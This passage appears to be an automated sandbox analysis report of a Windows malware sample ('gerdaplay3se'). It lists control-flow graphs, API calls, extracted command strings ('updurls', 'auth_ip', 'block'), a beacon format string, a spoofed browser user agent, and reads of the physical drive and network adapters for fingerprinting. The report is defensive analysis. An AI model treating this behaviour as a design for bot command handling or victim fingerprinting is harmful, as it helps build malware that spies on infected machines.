                                                                                  control_flow_graph 0 2d672ab-2d672c3 InternetOpenA 1 2d67389-2d6738f 0->1 2 2d672c9-2d6731d InternetSetOptionA * 3 call 2d74a30 0->2 4 2d67391-2d67397 1->4 5 2d673ab-2d673b9 1->5 10 2d67322-2d67340 InternetOpenUrlA 2->10 6 2d6739d-2d673aa call 2d653ec 4->6 7 2d67399-2d6739b 4->7 8 2d666f4-2d666f6 5->8 9 2d673bf-2d673e3 call 2d74a30 call 2d6439c 5->9 6->5 7->5 13 2d666ff-2d66701 8->13 14 2d666f8-2d666fd 8->14 9->8 31 2d673e9-2d67417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d7227c 9->31 15 2d67382-2d67383 InternetCloseHandle 10->15 16 2d67342 10->16 17 2d66703 13->17 18 2d6670e-2d66742 RtlEnterCriticalSection RtlLeaveCriticalSection 13->18 21 2d66708 Sleep 14->21 15->1 22 2d67346-2d6736c InternetReadFile 16->22 17->21 26 2d66744-2d66750 18->26 27 2d66792 18->27 21->18 24 2d67377-2d6737e InternetCloseHandle 22->24 25 2d6736e-2d67375 22->25 24->15 25->22 26->27 30 2d66752-2d6675f 26->30 28 2d66796 27->28 28->0 32 2d66767-2d66768 30->32 33 2d66761-2d66765 30->33 39 2d6746d-2d67488 call 2d7227c 31->39 40 2d67419-2d6742b call 2d7227c 31->40 34 2d6676c-2d66790 call 2d74a30 * 2 32->34 33->34 34->28 48 2d67742-2d67754 call 2d7227c 39->48 49 2d6748e-2d67490 39->49 40->39 47 2d6742d-2d6743f call 2d7227c 40->47 47->39 56 2d67441-2d67453 call 2d7227c 47->56 57 2d67756-2d67758 48->57 58 2d6779d-2d677a6 call 2d7227c 48->58 49->48 52 2d67496-2d67548 call 2d72eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d74a30 * 5 call 2d6439c * 2 49->52 115 2d67585 52->115 116 2d6754a-2d6754c 52->116 56->39 70 2d67455-2d67467 call 2d7227c 56->70 57->58 60 2d6775a-2d67798 call 2d74a30 RtlEnterCriticalSection RtlLeaveCriticalSection 57->60 67 2d677ab-2d677af 58->67 60->8 71 2d677d0-2d677e2 call 2d7227c 67->71 72 2d677b1-2d677bf call 2d661f5 call 2d66303 67->72 70->8 70->39 81 2d67b00-2d67b12 call 2d7227c 71->81 82 2d677e8-2d677ea 71->82 87 2d677c4-2d677cb call 2d6640e 72->87 81->8 96 2d67b18-2d67b46 call 2d72eec call 2d74a30 call 2d6439c 81->96 82->81 85 2d677f0-2d67807 call 2d6439c 82->85 85->8 97 2d6780d-2d678db call 2d72358 call 2d61ba7 85->97 87->8 117 2d67b4f-2d67b56 call 2d72eb4 96->117 118 2d67b48-2d67b4a call 2d6534d 96->118 113 2d678e2-2d67903 RtlEnterCriticalSection 97->113 114 2d678dd call 2d6143f 97->114 121 2d67905-2d6790c 113->121 122 2d6790f-2d67945 RtlLeaveCriticalSection call 2d63c67 call 2d63d7e 113->122 114->113 119 2d67589-2d675b7 call 2d72eec call 2d74a30 call 2d6439c 115->119 116->115 123 2d6754e-2d67560 call 2d7227c 116->123 117->8 118->117 146 2d675f8-2d67601 call 2d72eb4 119->146 147 2d675b9-2d675c8 call 2d73529 119->147 121->122 136 2d6794a-2d67967 call 2d68272 122->136 123->115 134 2d67562-2d67583 call 2d6439c 123->134 134->119 142 2d6796c-2d67973 136->142 144 2d67ae7-2d67afb call 2d68f3a 142->144 145 2d67979-2d679b3 call 2d6a65c 142->145 144->8 152 2d679b8-2d679c1 145->152 159 2d67607-2d6761f call 2d73a8f 146->159 160 2d67738-2d6773b 146->160 147->146 156 2d675ca 147->156 157 2d679c7-2d679ce 152->157 158 2d67ab1-2d67ae2 call 2d68321 call 2d633b2 152->158 161 2d675cf-2d675e1 call 2d72790 156->161 163 2d679d1-2d679d6 157->163 158->144 172 2d67621-2d67629 call 2d6966e 159->172 173 2d6762b 159->173 160->48 175 2d675e6-2d675f6 call 2d73529 161->175 176 2d675e3 161->176 163->163 167 2d679d8-2d67a15 call 2d6a65c 163->167 177 2d67a1a-2d67a23 167->177 174 2d6762d-2d67661 call 2d6a786 call 2d63863 172->174 173->174 188 2d67666-2d67682 call 2d65119 174->188 175->146 175->161 176->175 177->158 182 2d67a29-2d67a2f 177->182 185 2d67a32-2d67a37 182->185 185->185 187 2d67a39-2d67a74 call 2d6a65c 185->187 187->158 192 2d67a76-2d67aaa call 2d6d04e 187->192 193 2d67687-2d676b8 call 2d63863 call 2d6aa2c 188->193 196 2d67aaf-2d67ab0 192->196 199 2d676bd-2d676cf call 2d6ab46 193->199 196->158 201 2d676d4-2d676e5 199->201 202 2d676e7 call 2d6380b 201->202 203 2d676ec-2d676fb Sleep 201->203 202->203 205 2d67703-2d67717 call 2d71830 203->205 207 2d67723-2d67731 205->207 208 2d67719-2d67722 call 2d64100 205->208 207->160 210 2d67733 call 2d6380b 207->210 208->207 210->160
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(0000EA60), ref: 02D66708
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66713
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D66724
                                                                                  • _memset.LIBCMT ref: 02D66779
                                                                                  • _memset.LIBCMT ref: 02D66788
                                                                                  • InternetOpenA.WININET(?), ref: 02D672B5
                                                                                  • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D672DD
                                                                                  • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D672F5
                                                                                  • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D6730D
                                                                                  • _memset.LIBCMT ref: 02D6731D
                                                                                  • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D67336
                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D67358
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 02D67378
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 02D67383
                                                                                  • _memset.LIBCMT ref: 02D673CB
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D673EE
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D673FF
                                                                                  • _malloc.LIBCMT ref: 02D67498
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D674AA
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D674B6
                                                                                  • _memset.LIBCMT ref: 02D674D0
                                                                                  • _memset.LIBCMT ref: 02D674DF
                                                                                  • _memset.LIBCMT ref: 02D674EF
                                                                                  • _memset.LIBCMT ref: 02D67502
                                                                                  • _memset.LIBCMT ref: 02D67518
                                                                                  • _malloc.LIBCMT ref: 02D6758E
                                                                                  • _memset.LIBCMT ref: 02D6759F
                                                                                  • _strtok.LIBCMT ref: 02D675BF
                                                                                  • _swscanf.LIBCMT ref: 02D675D6
                                                                                  • _strtok.LIBCMT ref: 02D675ED
                                                                                  • _free.LIBCMT ref: 02D675F9
                                                                                  • Sleep.KERNEL32(000007D0), ref: 02D676F1
                                                                                  • _memset.LIBCMT ref: 02D67765
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D67772
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D67784
                                                                                  • _sprintf.LIBCMT ref: 02D67822
                                                                                  • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D678E6
                                                                                  • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6791A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                  • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Pz$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                  • API String ID: 696907137-793996860
                                                                                  • Opcode ID: 96472d61c4ca3d4455a0e44bad87cc92fce96d7e18f51458b65c13bd403504ec
                                                                                  • Instruction ID: 1b46206e6cd75c6ead9bdde101451502ea212d8217309bbfaeef93b045dc03a9
                                                                                  • Opcode Fuzzy Hash: 96472d61c4ca3d4455a0e44bad87cc92fce96d7e18f51458b65c13bd403504ec
                                                                                  • Instruction Fuzzy Hash: 7B32EE31548381AFE724AB24DC08BBBBBE6EF95314F10481DF58997391EB759C04CBA2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 477 2d6648b-2d664ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 478 2d664f3-2d666f1 GetTickCount call 2d6605a GetVersionExA call 2d74a30 call 2d72eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d74a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d72eec * 4 QueryPerformanceCounter Sleep call 2d72eec * 2 call 2d74a30 * 2 477->478 479 2d664ee call 2d642c7 477->479 522 2d666f4-2d666f6 478->522 479->478 523 2d666ff-2d66701 522->523 524 2d666f8-2d666fd 522->524 525 2d66703 523->525 526 2d6670e-2d66742 RtlEnterCriticalSection RtlLeaveCriticalSection 523->526 527 2d66708 Sleep 524->527 525->527 528 2d66744-2d66750 526->528 529 2d66792 526->529 527->526 528->529 531 2d66752-2d6675f 528->531 530 2d66796-2d672c3 InternetOpenA 529->530 536 2d67389-2d6738f 530->536 537 2d672c9-2d67340 InternetSetOptionA * 3 call 2d74a30 InternetOpenUrlA 530->537 533 2d66767-2d66768 531->533 534 2d66761-2d66765 531->534 535 2d6676c-2d66790 call 2d74a30 * 2 533->535 534->535 535->530 540 2d67391-2d67397 536->540 541 2d673ab-2d673b9 536->541 550 2d67382-2d67383 InternetCloseHandle 537->550 551 2d67342 537->551 542 2d6739d-2d673aa call 2d653ec 540->542 543 2d67399-2d6739b 540->543 541->522 545 2d673bf-2d673e3 call 2d74a30 call 2d6439c 541->545 542->541 543->541 545->522 560 2d673e9-2d67417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d7227c 545->560 550->536 555 2d67346-2d6736c InternetReadFile 551->555 557 2d67377-2d6737e InternetCloseHandle 555->557 558 2d6736e-2d67375 555->558 557->550 558->555 563 2d6746d-2d67488 call 2d7227c 560->563 564 2d67419-2d6742b call 2d7227c 560->564 570 2d67742-2d67754 call 2d7227c 563->570 571 2d6748e-2d67490 563->571 564->563 569 2d6742d-2d6743f call 2d7227c 564->569 569->563 578 2d67441-2d67453 call 2d7227c 569->578 579 2d67756-2d67758 570->579 580 2d6779d-2d677af call 2d7227c 570->580 571->570 574 2d67496-2d67548 call 2d72eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d74a30 * 5 call 2d6439c * 2 571->574 637 2d67585 574->637 638 2d6754a-2d6754c 574->638 578->563 592 2d67455-2d67467 call 2d7227c 578->592 579->580 582 2d6775a-2d67798 call 2d74a30 RtlEnterCriticalSection RtlLeaveCriticalSection 579->582 593 2d677d0-2d677e2 call 2d7227c 580->593 594 2d677b1-2d677bf call 2d661f5 call 2d66303 580->594 582->522 592->522 592->563 603 2d67b00-2d67b12 call 2d7227c 593->603 604 2d677e8-2d677ea 593->604 609 2d677c4-2d677cb call 2d6640e 594->609 603->522 618 2d67b18-2d67b46 call 2d72eec call 2d74a30 call 2d6439c 603->618 604->603 607 2d677f0-2d67807 call 2d6439c 604->607 607->522 619 2d6780d-2d678db call 2d72358 call 2d61ba7 607->619 609->522 639 2d67b4f-2d67b56 call 2d72eb4 618->639 640 2d67b48-2d67b4a call 2d6534d 618->640 635 2d678e2-2d67903 RtlEnterCriticalSection 619->635 636 2d678dd call 2d6143f 619->636 643 2d67905-2d6790c 635->643 644 2d6790f-2d67973 RtlLeaveCriticalSection call 2d63c67 call 2d63d7e call 2d68272 635->644 636->635 641 2d67589-2d675b7 call 2d72eec call 2d74a30 call 2d6439c 637->641 638->637 645 2d6754e-2d67560 call 2d7227c 638->645 639->522 640->639 668 2d675f8-2d67601 call 2d72eb4 641->668 669 2d675b9-2d675c8 call 2d73529 641->669 643->644 666 2d67ae7-2d67afb call 2d68f3a 644->666 667 2d67979-2d679c1 call 2d6a65c 644->667 645->637 656 2d67562-2d67583 call 2d6439c 645->656 656->641 666->522 679 2d679c7-2d679ce 667->679 680 2d67ab1-2d67ae2 call 2d68321 call 2d633b2 667->680 681 2d67607-2d6761f call 2d73a8f 668->681 682 2d67738-2d6773b 668->682 669->668 678 2d675ca 669->678 683 2d675cf-2d675e1 call 2d72790 678->683 685 2d679d1-2d679d6 679->685 680->666 694 2d67621-2d67629 call 2d6966e 681->694 695 2d6762b 681->695 682->570 697 2d675e6-2d675f6 call 2d73529 683->697 698 2d675e3 683->698 685->685 689 2d679d8-2d67a23 call 2d6a65c 685->689 689->680 704 2d67a29-2d67a2f 689->704 696 2d6762d-2d676cf call 2d6a786 call 2d63863 call 2d65119 call 2d63863 call 2d6aa2c call 2d6ab46 694->696 695->696 723 2d676d4-2d676e5 696->723 697->668 697->683 698->697 707 2d67a32-2d67a37 704->707 707->707 709 2d67a39-2d67a74 call 2d6a65c 707->709 709->680 714 2d67a76-2d67aaa call 2d6d04e 709->714 718 2d67aaf-2d67ab0 714->718 718->680 724 2d676e7 call 2d6380b 723->724 725 2d676ec-2d67717 Sleep call 2d71830 723->725 724->725 729 2d67723-2d67731 725->729 730 2d67719-2d67722 call 2d64100 725->730 729->682 732 2d67733 call 2d6380b 729->732 730->729 732->682
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.NTDLL(02D971B8), ref: 02D664BA
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D664D1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D664DA
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D664E9
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D664EC
                                                                                  • GetTickCount.KERNEL32 ref: 02D664F8
                                                                                    • Part of subcall function 02D6605A: _malloc.LIBCMT ref: 02D66068
                                                                                  • GetVersionExA.KERNEL32(02D97010), ref: 02D66525
                                                                                  • _memset.LIBCMT ref: 02D66544
                                                                                  • _malloc.LIBCMT ref: 02D66551
                                                                                    • Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
                                                                                    • Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
                                                                                    • Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F
                                                                                  • _malloc.LIBCMT ref: 02D66561
                                                                                  • _malloc.LIBCMT ref: 02D6656C
                                                                                  • _malloc.LIBCMT ref: 02D66577
                                                                                  • _malloc.LIBCMT ref: 02D66582
                                                                                  • _malloc.LIBCMT ref: 02D6658D
                                                                                  • _malloc.LIBCMT ref: 02D66598
                                                                                  • _malloc.LIBCMT ref: 02D665A7
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D665BE
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D665C7
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665D6
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D665D9
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665E4
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D665E7
                                                                                  • _memset.LIBCMT ref: 02D665FA
                                                                                  • _memset.LIBCMT ref: 02D66606
                                                                                  • _memset.LIBCMT ref: 02D66613
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66621
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D6662E
                                                                                  • _malloc.LIBCMT ref: 02D66652
                                                                                  • _malloc.LIBCMT ref: 02D66660
                                                                                  • _malloc.LIBCMT ref: 02D66667
                                                                                  • _malloc.LIBCMT ref: 02D6668D
                                                                                  • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D666A0
                                                                                  • Sleep.KERNELBASE ref: 02D666AE
                                                                                  • _malloc.LIBCMT ref: 02D666BA
                                                                                  • _malloc.LIBCMT ref: 02D666C7
                                                                                  • _memset.LIBCMT ref: 02D666DC
                                                                                  • _memset.LIBCMT ref: 02D666EC
                                                                                  • Sleep.KERNELBASE(0000EA60), ref: 02D66708
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66713
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D66724
                                                                                  • _memset.LIBCMT ref: 02D66779
                                                                                  • _memset.LIBCMT ref: 02D66788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                  • API String ID: 2251652938-2678694477
                                                                                  • Opcode ID: c35143b2fa8c555d0659105cbde004407fec1e7b78de1bb58bab98b9f73105f4
                                                                                  • Instruction ID: 9468d3d0aef4ee668e3d9b6a323c7ee8c8eec08eacf0f447ad973c82e39aea57
                                                                                  • Opcode Fuzzy Hash: c35143b2fa8c555d0659105cbde004407fec1e7b78de1bb58bab98b9f73105f4
                                                                                  • Instruction Fuzzy Hash: C57142B1D583509BF310AB749C49B6BBBE9EF45714F20081DF99597380EA789C40CFA6

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 836 401b4b-401b68 LoadLibraryA 837 401c21-401c25 836->837 838 401b6e-401b7f GetProcAddress 836->838 839 401b85-401b8e 838->839 840 401c18-401c1b FreeLibrary 838->840 841 401b95-401ba5 GetAdaptersInfo 839->841 840->837 842 401ba7-401bb0 841->842 843 401bdb-401be3 841->843 846 401bc1-401bd7 call 402bc0 call 4018cc 842->846 847 401bb2-401bb6 842->847 844 401be5-401beb call 402ba6 843->844 845 401bec-401bf0 843->845 844->845 850 401bf2-401bf6 845->850 851 401c15-401c17 845->851 846->843 847->843 852 401bb8-401bbf 847->852 850->851 855 401bf8-401bfb 850->855 851->840 852->846 852->847 857 401c06-401c13 call 402b98 855->857 858 401bfd-401c03 855->858 857->841 857->851 858->857
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                  • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                  • API String ID: 514930453-3667123677
                                                                                  • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                  • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                                                  • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                  • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 910 2d6f8de-2d6f901 LoadLibraryA 911 2d6f907-2d6f915 GetProcAddress 910->911 912 2d6f9c1-2d6f9c8 910->912 913 2d6f9ba-2d6f9bb FreeLibrary 911->913 914 2d6f91b-2d6f92b 911->914 913->912 915 2d6f92d-2d6f939 GetAdaptersInfo 914->915 916 2d6f971-2d6f979 915->916 917 2d6f93b 915->917 919 2d6f982-2d6f987 916->919 920 2d6f97b-2d6f981 call 2d736eb 916->920 918 2d6f93d-2d6f944 917->918 924 2d6f946-2d6f94a 918->924 925 2d6f94e-2d6f956 918->925 922 2d6f9b5-2d6f9b9 919->922 923 2d6f989-2d6f98c 919->923 920->919 922->913 923->922 927 2d6f98e-2d6f993 923->927 924->918 928 2d6f94c 924->928 929 2d6f959-2d6f95e 925->929 930 2d6f995-2d6f99d 927->930 931 2d6f9a0-2d6f9ab call 2d73a8f 927->931 928->916 929->929 932 2d6f960-2d6f96d call 2d6f62d 929->932 930->931 931->922 937 2d6f9ad-2d6f9b0 931->937 932->916 937->915
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D6F8F4
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D6F90D
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D6F932
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D6F9BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                  • API String ID: 514930453-3114217049
                                                                                  • Opcode ID: 674141bc7bd3c9628577747ccab938c777c85fb0413cbdfd64e42b068edae957
                                                                                  • Instruction ID: 076f8db08d4ab9c2e01554bcdf46ca0a1437f39406add11a08ff27f9328eaea1
                                                                                  • Opcode Fuzzy Hash: 674141bc7bd3c9628577747ccab938c777c85fb0413cbdfd64e42b068edae957
                                                                                  • Instruction Fuzzy Hash: D521A275A0460AAFDB10DBA8E888BFEBBB9EF05310F1440AAD546E7741D7308D45CBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 995 2d6f7da-2d6f805 CreateFileA 996 2d6f8d6-2d6f8dd 995->996 997 2d6f80b-2d6f820 995->997 998 2d6f823-2d6f845 DeviceIoControl 997->998 999 2d6f847-2d6f84f 998->999 1000 2d6f87e-2d6f886 998->1000 1003 2d6f851-2d6f856 999->1003 1004 2d6f858-2d6f85d 999->1004 1001 2d6f88f-2d6f891 1000->1001 1002 2d6f888-2d6f88e call 2d736eb 1000->1002 1006 2d6f893-2d6f896 1001->1006 1007 2d6f8cc-2d6f8d5 CloseHandle 1001->1007 1002->1001 1003->1000 1004->1000 1008 2d6f85f-2d6f867 1004->1008 1010 2d6f8b2-2d6f8bf call 2d73a8f 1006->1010 1011 2d6f898-2d6f8a1 GetLastError 1006->1011 1007->996 1012 2d6f86a-2d6f86f 1008->1012 1010->1007 1019 2d6f8c1-2d6f8c7 1010->1019 1011->1007 1013 2d6f8a3-2d6f8a6 1011->1013 1012->1012 1015 2d6f871-2d6f87d call 2d6f62d 1012->1015 1013->1010 1016 2d6f8a8-2d6f8af 1013->1016 1015->1000 1016->1010 1019->998
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D6F7F9
                                                                                  • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D6F837
                                                                                  • GetLastError.KERNEL32 ref: 02D6F898
                                                                                  • CloseHandle.KERNELBASE(?), ref: 02D6F8CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                  • String ID: \\.\PhysicalDrive0
                                                                                  • API String ID: 4026078076-1180397377
                                                                                  • Opcode ID: 3cb28d4238135f4dc3e35ccab607718407d28793018ab9e842ffa1a25ba45b88
                                                                                  • Instruction ID: 4fc47650e4b3ec9450e60da938ca4b137402b7286b13fb29352b23741be5ef48
                                                                                  • Opcode Fuzzy Hash: 3cb28d4238135f4dc3e35ccab607718407d28793018ab9e842ffa1a25ba45b88
                                                                                  • Instruction Fuzzy Hash: 303170B1D00619AFDB24DF94E848BBEBBB9EF05754F3041AAE516A7780D7705E04CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1021 401a4f-401a77 CreateFileA 1022 401b45-401b4a 1021->1022 1023 401a7d-401a91 1021->1023 1024 401a98-401ac0 DeviceIoControl 1023->1024 1025 401ac2-401aca 1024->1025 1026 401af3-401afb 1024->1026 1029 401ad4-401ad9 1025->1029 1030 401acc-401ad2 1025->1030 1027 401b04-401b07 1026->1027 1028 401afd-401b03 call 402ba6 1026->1028 1033 401b09-401b0c 1027->1033 1034 401b3a-401b44 CloseHandle 1027->1034 1028->1027 1029->1026 1031 401adb-401af1 call 402bc0 call 4018cc 1029->1031 1030->1026 1031->1026 1037 401b27-401b34 call 402b98 1033->1037 1038 401b0e-401b17 GetLastError 1033->1038 1034->1022 1037->1024 1037->1034 1038->1034 1040 401b19-401b1c 1038->1040 1040->1037 1044 401b1e-401b24 1040->1044 1044->1037
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                  • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                  • GetLastError.KERNEL32 ref: 00401B0E
                                                                                  • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                  • String ID: \\.\PhysicalDrive0
                                                                                  • API String ID: 4026078076-1180397377
                                                                                  • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                  • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                                                  • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                  • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 213 2d663d2-2d663ec 214 2d663ee-2d6640d 213->214 215 2d66469-2d6646e 213->215 216 2d66470-2d66473 215->216 217 2d6649c-2d666f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d642c7 GetTickCount call 2d6605a GetVersionExA call 2d74a30 call 2d72eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d74a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d72eec * 4 QueryPerformanceCounter Sleep call 2d72eec * 2 call 2d74a30 * 2 215->217 218 2d66475-2d6647f 216->218 219 2d66480-2d6648a 216->219 264 2d666f4-2d666f6 217->264 218->219 265 2d666ff-2d66701 264->265 266 2d666f8-2d666fd 264->266 267 2d66703 265->267 268 2d6670e-2d66742 RtlEnterCriticalSection RtlLeaveCriticalSection 265->268 269 2d66708 Sleep 266->269 267->269 270 2d66744-2d66750 268->270 271 2d66792 268->271 269->268 270->271 273 2d66752-2d6675f 270->273 272 2d66796-2d672c3 InternetOpenA 271->272 278 2d67389-2d6738f 272->278 279 2d672c9-2d67340 InternetSetOptionA * 3 call 2d74a30 InternetOpenUrlA 272->279 275 2d66767-2d66768 273->275 276 2d66761-2d66765 273->276 277 2d6676c-2d66790 call 2d74a30 * 2 275->277 276->277 277->272 282 